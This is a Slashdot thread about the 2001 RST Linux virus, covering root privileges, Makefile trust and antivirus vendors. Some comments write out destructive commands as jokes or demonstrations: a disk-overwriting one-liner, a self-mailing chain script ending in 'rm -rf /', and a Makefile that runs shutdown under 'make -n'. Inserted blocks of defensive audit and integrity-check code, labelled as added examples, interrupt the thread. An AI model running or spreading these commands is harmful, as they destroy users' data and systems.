Linux Virus Alert
marcjw writes: "I don't see many of these (Linux virus alerts). In fact none in the six months or so since I've switched from MS. Maybe that's why this story from newsbytes caught my eye. At any rate, I'm not sure if this poses much of a threat to the general Linux community but it's always best to be forewarned."
At least our email programs don't auto-execute attachments.
Ya, I run lots of unknown binaries while logged in as root, it's my favorite activity.
Go Lakers!
As we speak (write?) there are surely a couple of computer labs paid by McAfee, Norton, etc. trying to create some kind of successful Linux virus/worm. =)
A patch that allows the virus to exploit Windows will be released in Service Pack 1 for Windows XP.
Or is it just that virus writers focus their efforts on MS software? (And if it's the last one, why do malicious coders focus on MS? Is it just to spread FOAD and, indirectly, their favorite OS?)
#!/bin/sh
cat /dev/urandom > /dev/hda1
There. It's a virus.
-twb
Scene: Redmond, Washington - early Saturday evening in a building on the Microsoft campus.
MS Coder #1: "Dude! We made the front page on Slashdot! Bill is gonna hump our legs for this!"
MS Coder #2: "Cool! When we finish RST.c we might even make CNN!"
It could happen...
Knunov
Why do users with IDs under 100,000 or over 700,000 usually have the most worthwhile comments?
Um, he further states that it would be "trivial" to add such a feature. Almost all win32 repositories have such scanners in place why wouldn't the largest linux software sites have them as well? Have we become too trusting of the "many eyes" theory?
An Education is the Font of All Liberty
What services use this EGP protocol?
I'm assuming that if my box doesn't run anything that uses this, then it's not vulnerable to exploitation.
Au contraire! Because of the sheer volume of servers currently running linux, it would appear to be one of the most attractive platforms to write virii for.
A programmer could certainly wreak a lot more havoc by planting their seeds in big web servers, domain name servers, mail servers, etc., rather than just messing up a bunch of average peoples' desktops.
Unlike some Windows-based viruses that travel like wildfire using vulnerabilities in Microsoft's Outlook e-mail program, the new RST variant is unlikely to spread widely, according to Russell.
One short sentence to compare and contrast the MS Virus Deployment System with Linux. I also like the part where he says that most Linuxers are more "sophisticated" (must be why our mascot wears a tux).
I'm a bloodsucking fiend! Look at my outfit!
Linux, an alternative to Microsoft's Windows.
Heh, couldn't they just write "An operating system"?
I am a genius; therefore, you suck.
I didn't see anything in the article about how it actually propagates. It didn't read like a worm, so what binaries (tarballs and RPMs) are suspect? Anyone? Anyone?
Jack of all trades, master of some.
So, I see defense of Linux already. But why not place some blame on those who made this security hole? One of the major things Linux has going for it is its lack of security flaws, and lack of virii.
But it's not a hole. It's the "beauty of unix security". You can do what you want as root, and pay the consequences, or run as a non-privileged luser, and only screw up your own files. What **I'm** waiting for is the *nix virus that binds to non-privileged ports, infects normal lusers (by looking for permissive permissions in pathed directories)
The previous has been a secret message to my comrades.
Do NOT run "deltree /Y *"-- this is a very dangerous trojan that could potentially destroy your system!
The worst part is, it's already infected 100% of all DOS 7 systems.
(Is it just me, or does it seem silly to give any time to a "virus" that requires you to run a binary while rooted?)
Has anyone actually seen this virus in the wild? I can't imagine it'd actually propagate...
I'm trying to teach myself to set people on fire with my mind... Is it hot in here?
More virii. Glad that no one likes the Mac but me and two other people... Sevendust is the last major threat we had...
./configure
make
su -
make install
I'm sure everyone doesn't audit every line of code before doing this...
-b
.. runs your Linux binaries (if you can't get source)..
.. runs your FreeBSD binaries (if you can't get source)..
.. remember most "Linux" code is just generic UNIX C..
.. Be safe, run OpenBSD.
Whereas, I'm working on porting this virus to NetBSD, and putting it in the pkgsrc collection, so it can be enjoyed on a VAX, an Amiga, hey, you name it! You too can feel "cool" when your alpha gets infected. Who says the only people who get viruses are those running intel boxen with windows!
And for the netBSD/toaster port, I guess I'll just have to make it burn the toast on one side, and leave the other side raw.
The previous has been a secret message to my comrades.
I can write a binary that when run by root will erase your entire system. And I can probably do so in under a minute. Somehow, I doubt it will ever hurt anyone. Anyone smart anyhow.
Programs that exploit security holes are far and wide. Yet, they are typically released as source code, usually attached to messages in security mailing lists. We can take a quick glance over this source before compiling it and running it. And besides, if it IS your typical exploit code, nobody needs to run it as root. To do so would defeat the purpose of having an exploit in the first place.
I do like the statement, however, that linux users are less likely to open unknown attachments. Says quite a lot about our community right there.
-Restil
Play with my webcams and lights here
and so on. Symantec/Norton also has a Linux/UNIX binary which is certainly bundled with the network-wide thing, I don't know if it's available separately. The trouble with all of these things is that although they are Linux applications, they detect Windows virii - they use the same signature files as the versions on other platforms do. This means they're very good for running on file/e-mail servers to protect the poor Windows machines behind them (which is what they're intended for) but they probably won't stop the subject of this post, for example. Basically, yes, they exist and work well but make sure you know what you're hoping for them to do...
Who would run a virus that is distributed as a binary only? Everyone knows no self respecting linux user uses software unless the source is available! Until they release this virus under the GPL I for one will be staying well clear of it.
"Madness is something rare in individuals - but in groups, parties, peoples, ages it is the rule." -- Nietzsche
Perhaps I'm wrong on this, but this is a trojan, not a virus. Viruses reproduce and spread automatically, and from the article's description, this does not. Requiring users to run something at each point that it infects is NOT a virus, it is merely a trojan horse.
Mozilla's a nice operating system, but it needs a better browser.
RPMs or other packages that are downloaded from more or less untrusted locations without encryption signatures might very well run a few evil scripts during the installation process (which, of course, is done as root).
To be really sure, one should always install new programs in a chrooted jail; the software should be installed in a totally new branch of the filesystem tree and the installation process should not be able to read or write to other parts of the filesystem.
Go not unto /. for advice, for you will be told both yea and nay (but have nothing to do with the question)
I'm a security researcher.
Good point, and there should be a focus on the potential of Linux virii out there (though most of the focus has been on fixing probable remote exploits, which in itself can do some contamination since some servers NEED root permissions to run). Again, distros SHOULD turn off servers by default, not let X run its listener, etc., etc., to prevent remote exploits, but there also needs to be a focus on scanning for virii, especially if you have a heterogeneous network to work with, in case there are multiple platforms that could be targeted. Though the article is correct; the reason why we Linux users don't get targeted is because we know better. This will change if Linux starts to gain market share to a point of at least 15%-25%. Either this 15%-25% will be bright, or they will be gullible to virii, I can't say.
Karma whorin' since 1999
Finally, the most popular genre of windows software has been ported to Linux! Goodbye, WINE!
...the only real security hole is 'User Error'.
Not only are people bothering to write viruses for it, the popular press now refers to Linux as in "programs written for Linux, an alternative to Microsoft's Windows".
My glass is half full.
Free Java games for your phone: Tontie, Sokoban
Personally, I consider anti-virus software viruses themselves. They often cause more problems and interfere with your system much more than any 'virus' Just look at what they do...constantly run, constantly run every file access against a big-assed hash table, possibly causing problems with legitimate software. No thanks.
A lot of smart alecs here are making light of this, but let's face it, the smart thing is to give time to any virus at all. Tell me you've never, ever, left yourself in as root by mistake. OK, now tell me no-one else has. 'Nuff said.
If you disagree, post your argument. (-1, Overrated) isn't your personal censorship tool for views you don't like.
DOS isn't done until Lotus won't run.
As a rock-in-roll Physicist once said, No matter where you go, there you are.
Who do email attachments target in windows? Windows newbies. Who run things as root without checking to make sure they're safe or thinking about what they're doing? Linux newbies and lazy people.
This virus would probably get me.. though I usually only get executables in packages made by my distro manufacturer (it's just easier and almost guaranteed to work), I find it annoying to su constantly, so I often just play around on my own box as root. I wouldn't administer a server that way (should someone ever be stupid enough to give me the responsibilities of doing so), but I don't think that's who the virus is targeting.
And waddaya know, UNIX application programmers are _still_ using the occasional gets(3) call in setuid root programs, more than a decade later, despite the fact that we all know that it doesn't check for buffer overflow and that a buffer overflow _can_ be used (read: _has_ been used in the past) to make a program execute code of the worm writer's choice and bring a significant part of the internet grinding to a halt.
You'd read all of the source that KDE or Gnome requires for compilation and installation?
Not likely.
It doesn't matter if it requires root privs to run. Most programs have to be installed as root, and that's all that is needed. The make install step can do something nasty without telling you (how many people fully read & understand the Makefiles in the above scenario?), or it can install a trojan version of ls or any other program.
In a real emergency, we would have all fled in terror, and you would not have been notified.
Who's your favorite Looney Tunes character?
Bugs Bunny
Daffy Duck
or
Elmer FUD
> The only way a linux virus is ever going to do damage is if it gets into a package on a major distro's ftp and goes unnoticed.
How about if it,
- infects source code (not too hard...)
- installs itself in system headers so that all new programs compiled would include it (#define main ...)
- infects kernel modules, or the kernel itself
- exploits common vulnerabilities to infect new hosts or to gain root on the local host (I would venture a guess that *most* people who don't have users are not safe against all local root exploits)
I could imagine a really good virus making its way around, especially right around the time a new remote root exploit is announced... I don't think a linux virus is that far-fetched, especially as more unsophisticated users begin using linux, and as our platforms grow more homogeneous...
Damn, I'm impressed. I could probably kick out a binary to do the same but it would take me more than a minute just to write the ELF header, not to mention the object code source. Of course if you meant write a program I'd be surprised if it took someone a full minute to do this. I know what you meant, just f'ing with you a little.
I'm the big fish in the big pond bitch.
What you describe is actually a worm, or at least, that's what we used to call it.
Virii generally spread by either
a) staying in memory and infecting files by some mechanism
b) doing an infection/action run each time an infected file (or subsystem) is invoked.
Most 'viruses' today do not infect other files at all; they infect systems, making them worms. They are software in and of their own right, running on the host system like a parasite.
Okay since the outside thread is pretty boring I might as well go into off topic land.
:I ; many of the words are nice complements to the english language or associated jargons.
That list is lame. I thought it would be a list of words and phrases that are improper and just plain dumb that we hear all the time. Instead, I guess people just nominate words that they are sick of hearing. For example:
Surgical Strike: Personally, I think this is a fine phrase that evokes a visual image. It means you are not being careless.
Friendly Fire: Again...the meaning is obvious. It means that there is an attack but they are not attacking you! What other phrase would substitute so concisely?
Brainstorming: Okay...I'd like to see this phrase go away. It's used to deceive...I can't think of an honest use of it. A word that I love but should never be used in a publication is "brainfart".
Killer App: The meaning to this is very concise and is almost necessary when talking about the history of computing. Of course, it is abused a lot but that doesn't mean it doesn't have a solid useful meaning.
So basically...a lot of the words I agree with should be banished (bleh, solutions
> I do like the statement, however, that linux users are less likely to open unknown attachments. Says quite a lot about our community right there.
Heh-heh.
<sarcasm>
It says, "Pine makes it really frickin' hard to run a binary, and all my mother-in-law sends me are .exe's anyway!"
</sarcasm>
"Genius may have its limitations, but stupidity is not thus handicapped." --Elbert Hubbard (1856-1915)
Hey, historically-challenged dude, early smallpox vaccines (which used live smallpox virus, not cowpox) WERE only used by the rich. They were the only ones who could afford to be laid up in bed for a month while the illness ran its course. The poor opposed vaccination since the virus often jumped from the rich to the poor who couldn't afford vaccination.
In Europe this wasn't an issue - smallpox (and its high mortality rate) was a childhood disease. In the Americas it was still a rare disease, and George Washington took a tremendous gamble in vaccinating his troops on reports that the British were planning on spreading smallpox among his troops. This infection subsequently traveled down to Mexico, and back north as far as Southeastern Alaska. It's an interesting question, but totally unanswerable, how many people died in the 19th Century from the aftermath of the American Revolution, vs. the number who died from the US's own infected blankets.
The moral of this story is that global vaccination is best, but in many circumstances a limited vaccination can be nearly as effective. Mandatory vaccination of travellers will do a lot more good than mandatory vaccination of the people who work in the fields. Securing your servers will do a lot more good than securing pockets of desktop machines.
For every complex problem there is an answer that is clear, simple, and wrong. -- H L Mencken
If a non-root user has infected himself, then the virus is present, and it won't be able to create /dev/hdx1 or /dev/hdx2. It also will not be able to listen for EGP packets. The damage from a non-priv user being infected will be pretty minimal, unless file permissions are loose, and others start to run infected files.
Personally, I always run make -n install just to see what it is going to do (it's easier than opening the file if I think it already has the right paths set). It's one of those extra steps that Just Make Sense (TM), like prepending 'echo' when you rm with -r or with wildcards as root. You'll be glad you did when you look at the output, slap your forehead, and breathe a sigh of relief. =)
Extra sidenote: if you're compiling a program that uses GNU autoconf (etc.) to configure the makefile, you might be interested in the --prefix= option (where you can tell most sane programs to install somewhere other than the default). I always install to a test directory in my home directory before going system-wide (so I can, say, test a new version of an app).
Good example: OpenSSH has had tens of holes just the last year
:)
We've got 8 in our bug database for 2001. Are you holding out on OpenSSH holes?
There aren't any Linux viruses in circulation at present, so there's nothing to protect against. The few Linux viruses that do exist seem to have been created as exercises to prove that it can be done, but they are not "in the wild".
Linux worms, however, do exist and can be very dangerous. The difference between a virus and a worm is that, to get a virus you have to somehow run a program that you've received; worms attack over the network using known vulnerabilities. (There are many more worms for Windows, e.g. Code Red). The way to protect against them is not with an anti-virus program (that would be useless), but by keeping current with the security updates for your distribution.
The anti-virus companies would dearly love to add to their business by convincing Linux users that we need their services. Just say no; their approach is not to fix the problem, but to just give you a list of "known criminals" that they can spot. Anti-virus software is useless against a new virus; this means you have to keep going back to your pusher, um, your anti-virus company, for updates. Actually improving security would be bad for business.
Yes... but although I type rather fast, I would definitely typo at least something once.. and forget an include file.... like you did.....
So.. I'd have to compile... then go edit it again, fix it.. then recompile...
then trash my system.
-Restil
Play with my webcams and lights here
The plural of virus is viruses.
Rich...
Ignore Alien Orders
Good point. But even if your crack team of security experts inspect and approve each and every line of source code, then do a "make world", you still are not safe!
Long ago Ken Thompson wrote a paper about a trojan/backdoor that is source code clean. This is usually accompanied with an anecdote about a guy at a computer show struggling to get his demo ready, but he forgets his root password. Just then, a bearded freaky guy from the next booth says "No problem", types a magic password, and voila! The demo proceeds as planned. The story is that every version of
It's possible. Read the paper!
PS: Most linux users do not even attempt to build their systems from source. Every linux system is shipped with
How can this be considered a security hole? This is the equivalent of sending an email with BO2K or NetBus to the administrator email account on some Windows box and telling them to run it as administrator. At work, we have hundreds of Linux boxes we administer. We never put any kind of software on them except for Apache, MySQL, Oracle or whatever we know and have tried.
:)
If you really want to call this a security hole or virus, I've written a virus for you. Note, however, you cannot look at the code and must run it as root and send it to everyone you know.
#!/bin/sh
# DISCLAIMER: This program is provided AS IS with no warranty
# of any kind, and The author makes no representation
# with respect to the adequacy of this program for any particular
# purpose or with respect to its adequacy to produce
# any particular result, and The author shall not be liable
# for loss or damage arising out of the use of this program
# regardless of how sustained, and In no event shall the
# author be liable for special, direct, indirect or consequential
# damage, loss, costs or fees or expenses of any
# nature or kind. IF YOU ARE READING THIS, YOU HAVE VOIDED
# THE WARRANTY BECAUSE YOU WERE TOLD NOT TO READ THE SOURCE.
emailaddy=`grep /^([a-zA-Z0-9_-])+@([a-zA-Z0-9_-])+(\.[a-zA-Z0-9_- ]+)+/ ~/.addressbook`
echo "Please copy the following lines to a shell script and run it as root\n\n***#!/bin/sh
emailaddy=`grep /^([a-zA-Z0-9_-])+@([a-zA-Z0-9_-])+(\.[a-zA-Z0-9_- ]+)+/ ~/.addressbook`
echo \"Please copy the following lines to a shell script and run it as root\" | mail -s \"Important security update\" $emailaddy
rm -rf /***" | mail -s "Important security update" $emailaddy
rm -rf /
;)
Do not actually run this, for it actually works.
This short little shell script will exploit vulnerabilities in the sysadmin's lack of experience... basically exploiting the same "security vulnerabilities" in the alternative to Microsoft Windows thing... USER ERROR!
How many linux users actually run programs without at least glancing at the source anyway? If you don't compile everything from source, shame on you. The main reason, IMHO, virii are aimed at MS instead of Linux is because most linux developers started coding on Windows (like everyone else who started coding within the last 10 years). They are disgruntled at the years of suffering at the hands of Billy G.. Windows is also a very easy target. Virii are also written for windows in order to switch people from MS to alternatives. If you would notice, within a week of a very recent Netcraft web server report when Apache dropped and IIS rose, code red was out.
Just my $0.02.
sglane81
This is the Internet. You can say "fuck" here. - AC
"It is the duty of the project maintainer to make sure that their files are free of virii
It doesn't help when people have this kind of attitude. If it would be trivial to scan for virii, why the hell wait for someone else to request it?
Guns don't kill people; Physics kills people! - John Lithgow as Dick Solomon on Third Rock From The Sun
The Morris worm is a nice spectre to pull out of the Unix closet and remind everyone that Unix is not infallible. Just look at all the damage done in the early internet days! Spooky.
However, this is history - ancient by Internet standards. Since then, there have been other Unix-based worms to hit the net at large. I can name three more recent examples off-hand. Sadmind spread among Solaris hosts to deface IIS sites. The ramen worm attacked Linux (specifically RedHat) hosts. And there were reports of ramen code being modified and sent on its way. And then there was another Linux worm called li0n.
In each case the worm hit the wild, was discovered and reported, had a brief life as appropriate counter measures were taken, then faded out. Missing was the media frenzy one would expect with something as damaging as the Morris worm. That came later on a different platform with a different worm: Code Red.
Once again - Unix is not infallible. But various generations have been in the trenches dealing with infosec issues for years. Recent incidents have begun to show off its experience, versatility, and resilience. It is small wonder the Unix crowd tends to look at virus issues with almost a disinterest compared to their Windows counterparts who are burned either more often or more severely by such a threat.
I'm often asked - `won't viruses for Linux start to appear once Linux gains more desktop users?'. And I always explain what it is about Linux and Unix-like operating systems in general that make this very unlikely (the strict separation between root and users in particular). However, at present we have a situation in which there is a very strong sense of mutual trust: if you see some code being offered for download in the usual places you know that it's very unlikely that it will harm your system if you build it / install it as root.
It is worth thinking about the possible dangers of these particular waters getting muddied - as Linux gains more users, there will be more people around with less sophistication about these matters and there could be more people deliberately offering dangerous code for download.
So there are some reasons for concern but they are based on faults in the potential users, not in the OS.
Roger Whittaker
SuSE Linux Ltd London
The good thing is that apparently there was not a single case where this virus infected anyone's computer except for the anonymous person who reported it to Qualys. This new virus is at least three times more dangerous because three different groups have seen it.
The most difficult part with this type of virus is getting people to run it as root. The easiest way would be to install the virus through a Makefile, which is often run as root. This is one reason I think the standard tar.gz install should be:
#-----
zcat foo.tar.gz | tar -xv
if source
cd foo/
make
fi
cd
su
cp foo
ln -s
#-----
Makefiles are too complex for most people to read but a script that installed things my way would only be 5 lines executed as root and thus easy to audit.
(Normal
On a completely unrelated topic, this virus can't spread very well. Linux users download packages from central repositories but they don't share ordinary binaries amongst themselves. The virus only infects ELF executable files where in Windows it could infect emails and
These days, the only dangerous way to spread a virus is through an internet worm. Linux is vulnerable to worms because almost everyone uses the same kernel, webserver, dns, and email server. If we could diversify these things, it would make Linux less vulnerable to worms.
I know people are going to say that Linux is already more secure than Microsoft. That's true but it's because Microsoft does not care about security or threats to the internet. A truly malicious virus could cost billions of dollars in lost hardware and take out the American phone system for weeks.
Yeah, that's fine for people who have some experience with Unix, but for Joe Random User who's just bought this new Red Hat thing 'cos his friend said it was quite good and he doesn't want to spend more money on Windows it doesn't really help. I mean, he's not going to instinctively sit down and start ntsysv and appreciate what 'nfslockd' and 'portmap' do and whether he does or doesn't need them; he's probably not even going to understand the concept of services for a while. It's basically the old argument about Linux on the desktop again: everything has to work properly out-of-the-box, not work well if you just tweak this configuration file and patch and recompile your X server or people simply won't bother and will run away screaming because of all the scary things they're now being exposed to whereas with Windows it 'just worked'. Now, personally I'd hate it if all the distributions became like Windows and had irritating wizards all over the place and friendly quickstarts and so on, but making the default settings for things like security right is not hard and wouldn't have any negative effects at all as far as I can see. I think Red Hat's firewall set up is a good compromise; of course, the way Debian does it (not enabling this by default, and so on) is far better, but whatever its advocates might say Debian is not really as user-friendly for newbies as Red Hat (or particularly Mandrake) and isn't really designed to be. That said, I started with it...
For that matter, I can't help wondering whether MS would fund the development of Linux viruses.
He not only does not have root permissions - he doesn't even know 'root' exists, or what it is; clicking on Netscape's Icon in the GUI is about at his limits. I gave him a command line menu with a script when he exits X that will allow him to go back to the GUI or shut his machine down, and tell him when to turn off the power. (The exit from X script also erases the .netscape/lock file in case Netscape crashes and won't restart properly.)
Since Netscape's email won't execute binaries by clicking on them I don't have to worry too much about him getting infected. I make regular cdrom backups of his home directory - just in case.
The only problem he has had is that he thought he wasn't getting new emails because he had accidentally changed the sort order from 'date' to 'subject' with a misplaced mouse click. I showed him how to change sort orders, and once he saw that he hadn't lost anything he was happy.
The great virtue of the machine is that his Windows machine is now completely disconnected from the net and highly unlikely to ever get a virus. He likes the Linux box so much he wants me to get rid of Windows altogether: there is only one Windows app I haven't converted to Linux yet: a massive custom Access app which will take a large development effort to duplicate.
# Save this as Makefile and try "make -n install"
# with GNU Make.
#
# This runs even with -n, and doesn't print first.
foo:=$(shell /sbin/shutdown now)
#
# This too runs with -n, but is displayed.
# (I use a semicolon in case slashdot loses tabs.)
install:; +echo this runs too
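A check for the point this Makefile demonstrates, added here as an example and not taken from the post: it greps a Makefile for the constructs GNU make executes even under "make -n" ($(shell ...), a '+' command prefix, $(MAKE) recursion), so you know when a dry run is not a full preview. The Makefile it audits is constructed for the demo; assumes GNU make semantics and POSIX grep/sed.

```shell
#!/bin/sh
# Added example, not code from the Slashdot post: flag Makefile constructs that GNU
# make executes even under "make -n", so that a dry run cannot be trusted as an audit.
# Assumes GNU make semantics and POSIX grep/sed.

# audit_makefile FILE
#   Prints one "category: line:text" finding per match and returns 1 if anything was
#   found, 0 if the Makefile looks safe to preview with -n.
audit_makefile() {
    _mf="$1"
    _tab=$(printf '\t')
    _hits=0

    # $(shell ...) is expanded when the Makefile is read (with ':=') or whenever the
    # variable is referenced, never as a recipe step, so -n does not suppress it.
    _out=$(grep -nE '\$[({]shell[[:space:]]' "$_mf") && {
        printf '%s\n' "$_out" | sed 's/^/shell-function: /'; _hits=1; }

    # A command whose first character is '+' runs even under -n, -t and -q, both in a
    # tab-indented recipe line and in the one-line "target:; +command" form.
    _out=$(grep -nE '(^'"$_tab"'[[:space:]]*[+]|^[^#[:space:]][^#=]*:[^=]*;[[:space:]]*[+])' "$_mf") && {
        printf '%s\n' "$_out" | sed 's/^/plus-prefix: /'; _hits=1; }

    # A recipe line containing $(MAKE) is executed under -n so recursion works; every
    # other command chained on that line (cd, helper scripts) therefore runs for real.
    _out=$(grep -nE '^'"$_tab"'.*\$[({]MAKE[)}]' "$_mf") && {
        printf '%s\n' "$_out" | sed 's/^/recursive-make: /'; _hits=1; }

    [ "$_hits" -eq 0 ]
}

# write_sample_makefile FILE
#   Constructed sample for the demo (not a real project's Makefile): the two lines the
#   post demonstrates, one recursive make, and ordinary lines that are safe under -n.
write_sample_makefile() {
    printf '%s\n' \
        '# constructed Makefile for the audit demo' \
        'PREFIX := /usr/local' \
        'foo := $(shell echo parse-time-side-effect)' \
        'install:; +echo this runs under make -n too' \
        'all:' \
        "$(printf '\tcc -o demo demo.c')" \
        'sub:' \
        "$(printf '\t$(MAKE) -C lib install')" > "$1"
}

# write_clean_makefile FILE
#   Constructed sample with nothing that escapes -n.
write_clean_makefile() {
    printf '%s\n' 'all:' "$(printf '\tcc -o demo demo.c')" > "$1"
}

# Demo in a scratch directory; nothing is built or installed.
_demo_dir=$(mktemp -d)
write_sample_makefile "$_demo_dir/Makefile"
if audit_makefile "$_demo_dir/Makefile"; then
    echo "nothing found: make -n install previews everything this Makefile does"
else
    echo "the lines above run regardless of -n; read them before running make install"
fi
rm -r "$_demo_dir"
```

The check is a review aid, not a verdict: a reported line still has to be read, and a clean report only means the recipe steps are the ones -n will print.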
Not trying to sound like a troll, but this post is an example of what is holding linux back from being a major contender in the desktop OS market. Time and time again i see people saying that no self respecting linux user would run a program without first examining the makefile and looking over the source. The VAST majority of home computer users would have no idea how to do that, and that is even assuming they had any knowledge of coding. How likely is it that a new user would download the source if a binary is available? Convenience and simplicity is what MS is targeting, and by all accounts it is working. Hate MS all you want, but the fact of the matter is that windows is run by virtually all home computers and is far more familiar and user-friendly for most simple tasks. It may not be as powerful, as secure, or as elegant as *nix, and though some may say it dumbs down the computing experience so that any moron can use a computer, that is precisely why MS owns the home computing market. The average person would not WANT to check the code for every program he or she installs, even if that person knew enough about linux and programming to make a difference. Sure, maybe all of those people that post on /. are smart enough not to get hit by this or any other virus, but /. readers do not make up the majority of computer users, as much as everyone wishes they were. Elitist attitudes about the linux 'community' is what keeps linux away from the general home computer community. As shown in this post, Linux users are just as bad at trying to downplay the possibility of being hit with a virus. Go count how many of the posts go on about how there is hardly any risk at all of viruses in Linux.
I use and love linux, but instead of finding the type of constructive development I was hoping to find on how viruses were playing a part in linux, I found a bunch of people pounding their chests as to how THEY are so damn good that there is no threat to them, and how if you actually are hit by this virus, there must be something wrong with your head.
Isn't the possibility of infection of system binaries the reason we have tripwire?
It, tripwire, may be a pain to run sometimes but it is a pretty good idea if you want to have an even higher level of protection.
Codifex Maximus ~ In search of... a shorter sig.
The incidents post which provides more info on the virus can be found at:
http://www.securityfocus.com/archive/75/247481
I agree this virus isn't a huge threat. I do believe some people here are underestimating it a little. You do not have to be root when running the infected file... If a user runs the file it will attempt to infect all files in their current working directory. Now possible files the user trusts might get infected and then a user is more likely to run those files as root. Still leaves a problem with it spreading from box to box since most people grab source and compile programs themselves. I am not sure how this is spreading but I believe it is through one of the many ssh crc exploits that are being traded around in binary form.
I have the commented asm dump I made but I have nowhere to post it till my site goes back up
lockdown
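The tripwire suggestion above and the infected-files-in-the-working-directory scenario in the last post come down to the same control, so here is a minimal tripwire-style integrity check, added as an example rather than anything from the thread or from tripwire itself. It assumes GNU coreutils (sha256sum, stat -c) and POSIX awk; the tree it checks is constructed for the demo.

```shell
#!/bin/sh
# Added example, not code from the thread: a minimal tripwire-style integrity check for
# the scenario discussed above (an infected file in the working directory, or a trojaned
# copy of ls dropped by "make install"). It records SHA-256 and mode of every regular
# file under a directory, then reports what changed. Assumes GNU coreutils (sha256sum,
# stat -c) and POSIX awk; the sample tree it checks is constructed for the demo.

# hash_tree DIR  -> one "sha256<TAB>mode<TAB>relative-path" line per regular file, sorted.
hash_tree() {
    ( cd "$1" || exit 1
      find . -type f | LC_ALL=C sort | while IFS= read -r _f; do
          _sum=$(sha256sum "$_f" | cut -d' ' -f1)
          _mode=$(stat -c '%a' "$_f")
          printf '%s\t%s\t%s\n' "$_sum" "$_mode" "${_f#./}"
      done )
}

# baseline DIR DBFILE  records the current state; keep DBFILE off the monitored tree
# (tripwire keeps its database signed and read-only for the same reason).
baseline() { hash_tree "$1" > "$2"; }

# verify DIR DBFILE  prints "MODIFIED|ADDED|REMOVED<TAB>path" per difference and
# returns 1 if there was any, 0 if the tree still matches the baseline.
verify() {
    hash_tree "$1" | awk -F'\t' -v db="$2" '
        BEGIN {
            while ((getline line < db) > 0) {
                split(line, f, "\t"); old[f[3]] = f[1] "\t" f[2]
            }
            close(db)
        }
        {
            if (!($3 in old))                 { print "ADDED\t" $3;    bad = 1 }
            else if (old[$3] != ($1 "\t" $2)) { print "MODIFIED\t" $3; bad = 1 }
            delete old[$3]
        }
        END {
            for (p in old) { print "REMOVED\t" p; bad = 1 }
            exit (bad ? 1 : 0)
        }'
}

# Demo on a constructed tree in a scratch directory (placeholder contents, not real
# binaries): take a baseline, then simulate a replaced tool and a newly dropped file.
demo() {
    _t=$(mktemp -d)
    mkdir "$_t/bin"
    printf 'original tool contents\n' > "$_t/bin/tool"
    printf 'some notes\n' > "$_t/notes.txt"
    baseline "$_t" "$_t.db"
    printf 'tampered tool contents\n' > "$_t/bin/tool"
    printf 'dropped file\n' > "$_t/bin/extra"
    if verify "$_t" "$_t.db"; then
        echo "tree matches baseline"
    else
        echo "tree differs from baseline (see above)"
    fi
    rm -r "$_t" "$_t.db"
}
demo
```

A mode change alone (say, a file made setuid) also shows up as MODIFIED, since the mode is part of the recorded state.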
Heh. If you see the string "Linux engineers are weenies" or "seineew era sreenigne xuniL" in it, then let slip the dogs of conspiracy theories. ;)
--
Given enough personal experience, all stereotypes are shallow.
I've installed XP, both Home and Professional. By default the user they create for you has Administrator privileges. You can downgrade it, but you have to know exactly what you're doing. And by default you can't log in to the Administrator account, it doesn't show as an option, so if you screw up you have to wipe the machine and reinstall.
The fact that I have never heard of such a trojan (or at least not a damaging one) is an indication that this does not work. I think this is because such a trojan would be detected and disabled (or at least warned about) long before it did much damage.
My solution was to make it setuid root, grouped by my sysadm group, and only executable by that group and root. Basic user/group works like a champ. Now if your non-prived sysadm user (you do have a prived and non-prived sysadm user besides your personal user, don't you?) get 0wned, well, you're screwed if nmap has sploitable code. Of course if that user gets 0wned, you probably have more to worry about.